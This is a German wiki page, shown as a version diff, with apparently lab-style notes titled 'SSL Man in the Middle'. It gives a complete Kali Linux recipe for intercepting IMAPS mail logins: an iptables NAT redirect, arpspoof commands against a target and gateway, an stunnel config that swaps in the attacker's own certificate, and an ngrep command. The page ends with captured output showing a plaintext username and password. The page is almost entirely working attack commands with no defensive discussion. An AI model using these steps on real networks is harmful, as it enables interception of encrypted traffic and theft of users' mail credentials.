SSL Man in the Middle: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) |
Thomas (Diskussion | Beiträge) (→nat) |
||
(9 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
Zeile 1: | Zeile 1: | ||
=Kali Linux= | =Kali Linux= | ||
==nat== | ==nat== | ||
− | + | *iptables -t nat -A PREROUTING -i eth0 -p tcp -d thor.tuxmen.de --dport 993 -j REDIRECT --to 993 | |
− | |||
==arpspoofing== | ==arpspoofing== | ||
− | + | *arpspoof -i eth0 -t 192.168.244.26 -r 192.168.244.100 | |
− | |||
− | |||
==stunnel== | ==stunnel== | ||
Zeile 18: | Zeile 15: | ||
[to-server] | [to-server] | ||
client = yes | client = yes | ||
− | accept = 0.0.0.0: | + | accept = 0.0.0.0:143 |
− | connect = thor. | + | connect = thor.schmeich.de:993 |
verify = 2 | verify = 2 | ||
CAfile = /etc/stunnel/ca.crt | CAfile = /etc/stunnel/ca.crt | ||
Zeile 25: | Zeile 22: | ||
[from-client] | [from-client] | ||
accept = 0.0.0.0:993 | accept = 0.0.0.0:993 | ||
− | connect = 127.0.0.1: | + | connect = 127.0.0.1:143 |
cert = /etc/stunnel/kali.mim.org.crt | cert = /etc/stunnel/kali.mim.org.crt | ||
key = /etc/stunnel/kali.mim.org.key | key = /etc/stunnel/kali.mim.org.key | ||
Zeile 33: | Zeile 30: | ||
==ngrep== | ==ngrep== | ||
− | *ngrep -d lo -s 1500 -l -i 'login' port | + | *ngrep -d lo -s 1500 -l -i 'login' port 143 |
<pre> | <pre> | ||
interface: lo (127.0.0.0/255.0.0.0) | interface: lo (127.0.0.0/255.0.0.0) | ||
− | filter: (ip or ip6) and ( port | + | filter: (ip or ip6) and ( port 143 ) |
match: login | match: login | ||
# | # | ||
− | T 127.0.0.1:45277 -> 127.0.0.1: | + | T 127.0.0.1:45277 -> 127.0.0.1:143 [AP] |
. login badura suxpass. | . login badura suxpass. | ||
## | ## | ||
</pre> | </pre> |
Aktuelle Version vom 2. September 2016, 09:44 Uhr
Kali Linux
nat
- iptables -t nat -A PREROUTING -i eth0 -p tcp -d thor.tuxmen.de --dport 993 -j REDIRECT --to 993
arpspoofing
- arpspoof -i eth0 -t 192.168.244.26 -r 192.168.244.100
stunnel
- cat /etc/stunnel/stunnel.conf
debug = 7 options = NO_SSLv2 output = /var/log/stunnel.log [to-server] client = yes accept = 0.0.0.0:143 connect = thor.schmeich.de:993 verify = 2 CAfile = /etc/stunnel/ca.crt [from-client] accept = 0.0.0.0:993 connect = 127.0.0.1:143 cert = /etc/stunnel/kali.mim.org.crt key = /etc/stunnel/kali.mim.org.key CAfile = /etc/stunnel/ca.crt
- stunnel4 /etc/stunnel/stunnel.conf
ngrep
- ngrep -d lo -s 1500 -l -i 'login' port 143
interface: lo (127.0.0.0/255.0.0.0) filter: (ip or ip6) and ( port 143 ) match: login # T 127.0.0.1:45277 -> 127.0.0.1:143 [AP] . login badura suxpass. ##